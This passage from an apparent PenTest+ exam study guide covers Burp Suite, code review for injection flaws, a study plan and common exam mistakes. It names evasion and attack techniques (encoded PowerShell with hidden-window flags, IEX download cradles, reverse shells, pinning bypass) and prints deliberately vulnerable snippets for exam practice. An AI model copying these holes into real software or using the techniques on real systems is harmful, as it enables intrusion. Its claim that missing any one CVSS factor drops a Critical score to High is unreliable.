- Proxy Module: Intercepts and modifies HTTP/HTTPS traffic between the browser and server. Requires installing Burp's CA certificate in the browser to intercept HTTPS. Core tool for web application testing
- Intruder: Automated attack tool for brute-forcing parameters, credential stuffing, fuzzing inputs, and testing all values in a list. Four attack modes: Sniper, Battering Ram, Pitchfork, Cluster Bomb
- Repeater: Manually resend and modify individual HTTP requests and view responses. Used to test specific injection points, verify vulnerabilities, and craft exploits
- Scanner (Pro): Automated vulnerability scanner that tests for SQLi, XSS, SSRF, XXE, path traversal, and hundreds of other issues. Pro feature — not available in Community edition
- SSL Pinning Bypass: When apps implement certificate pinning, Burp's CA is rejected. Bypass using Frida to hook the pinning validation function at runtime or use apktool to patch the APK
- Extensions: BApp Store provides community extensions. Notable: Autorize (authorization testing), Param Miner (hidden parameters), J2EEScan, SQLipy
Burp Suite is the dominant web application testing tool in the industry. The PenTest+ exam tests conceptual understanding — knowing what each module does, not every menu option. Focus on Proxy, Intruder, Repeater, and the concept of SSL pinning.
Scripting and Code Analysis
Key Concepts
- Python for Pentesting: Socket module for TCP connect scanners; requests module for HTTP testing; subprocess for running OS commands; struct for binary data manipulation. Understanding simple scripts is tested on PenTest+
- Bash Scripting: Ping sweeps using loops and ICMP, parsing Nmap output, automating directory enumeration, and one-liner reverse shells. Know shell metacharacters for command injection context
- PowerShell Obfuscation:
-EncodedCommand(Base64-encoded commands),-NoProfile -NonInteractive -WindowStyle Hidden(OPSEC flags), invoke-expression (IEX) download cradles. Core technique for Windows-based attacks and evasion - Code Review for Vulnerabilities: Identifying injection sinks (SQL queries, shell commands, template rendering, deserialization), missing input validation, hardcoded credentials, insecure random number generation, and trust boundary violations
- Identifying Vulnerability Type from Code: Seeing
query = "SELECT * FROM users WHERE name='" + user_input + "'"→ SQLi. Seeingos.system("ping " + user_input)→ command injection. Seeingexec(user_input)→ RCE
The Tools and Code Analysis domain (16%) includes reading short code snippets and identifying the vulnerability or attack technique. Practice recognizing SQLi, command injection, and SSRF patterns in Python, PHP, and Bash code.
📋 Scenario — identifying a vulnerability from a code snippet
Situation: The exam presents this Python snippet from a web app and asks you to identify the vulnerability and its CWE:
username = request.args.get('user')
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
Analysis: String concatenation to build a SQL query using unsanitised user input = SQL Injection (CWE-89). An attacker controls the user parameter and can inject SQL operators. Fix: Use a parameterised query: cursor.execute("SELECT * FROM users WHERE username = %s", (username,)). The database driver escapes the input — it can never be interpreted as SQL.
Other code-review patterns the exam tests: Hardcoded credentials (password = "admin123" in source — CWE-798). Missing input validation on file paths (path traversal — CWE-22). eval(user_input) — code injection (CWE-94). subprocess.call(user_input, shell=True) — OS command injection (CWE-78).
Key takeaways
- Burp Suite anatomy: Proxy (intercept), Repeater (manual replay/tweak), Intruder (fuzzing), Scanner (Pro-only auto-vuln). The exam asks you to pick the right tab for a stated task.
- Cracking decision tree:
hashcatfor GPU-accelerated cracking with-m <mode>,johnfor CPU + format auto-detect,hydrafor online (live login) brute-force. Online ≠ offline — different defenses, different speeds. - Always read the exploit code before running it. PoC GitHub repos sometimes include backdoors (reverse shells in
__init__, malicious URLs in payload). Sandbox + diff against known-good before pointing at a client.
⚡ Mini-quiz — Drill Burp tab functions, hashcat vs john vs hydra selection, and pre-flight exploit-code review.
Quick quiz →
4-Week PenTest+ Study Plan
Week 1 — Foundation & Recon
- Day 1–2: Planning, scoping, legal documents, engagement types (Module 1)
- Day 3–4: Passive recon — OSINT, theHarvester, Shodan, certificate transparency, Google dorks
- Day 5–6: Active scanning — Nmap flags, Nikto, enum4linux, vulnerability scanners
- Day 7: Quiz session — Planning & Recon domains (pentest-001 to pentest-021)
Week 2 — Attacks & Exploits
- Day 1–2: Metasploit framework — modules, payloads, Meterpreter, sessions
- Day 3–4: Web attacks — SQLi, XSS, CSRF, path traversal, SSRF, XXE, IDOR
- Day 5–6: Network attacks — ARP poisoning, Pass-the-Hash, Kerberoasting, password spraying
- Day 7: Wireless and physical attacks — WPA2 cracking, evil twin, tailgating, badge cloning
Week 3 — Post-Exploitation & Reporting
- Day 1–2: Linux privilege escalation — SUID, sudo, cron jobs, kernel exploits
- Day 3–4: Windows privilege escalation — Mimikatz, token impersonation, unquoted service paths
- Day 5–6: Report writing — CVSS scoring, finding structure, executive summary vs. technical findings
- Day 7: Ethics, responsible disclosure, cleanup, retesting concepts
Week 4 — Tools, Code & Final Review
- Day 1–2: Tool deep-dives — Burp Suite modules, Wireshark filters, Netcat, Hydra
- Day 3–4: Code analysis — reading Python/Bash/PowerShell scripts, identifying vulnerability types
- Day 5–6: Full practice quiz runs — timed, all 60 questions, review all incorrect answers
- Day 7: Final review of CVSS scoring, tool-to-use-case mapping, and key methodology phases
Top 3 PenTest+ Exam Mistakes
- Confusing passive and active recon: Shodan and theHarvester are passive (they query databases, not the target). Nmap and Nikto are active (they send packets to the target). Know this distinction cold.
- Mixing up attack techniques: Pass-the-Hash uses NTLM hashes. Kerberoasting cracks service tickets offline. AS-REP Roasting targets accounts with no pre-auth. Golden Ticket forges TGTs with KRBTGT hash. Each has a distinct mechanism.
- Getting CVSS scoring wrong: Critical requires network-accessible + no-auth + no-interaction + full CIA impact. Missing any one of these drops to High. Memorize the score ranges: Critical 9.0–10.0, High 7.0–8.9, Medium 4.0–6.9, Low 0.1–3.9.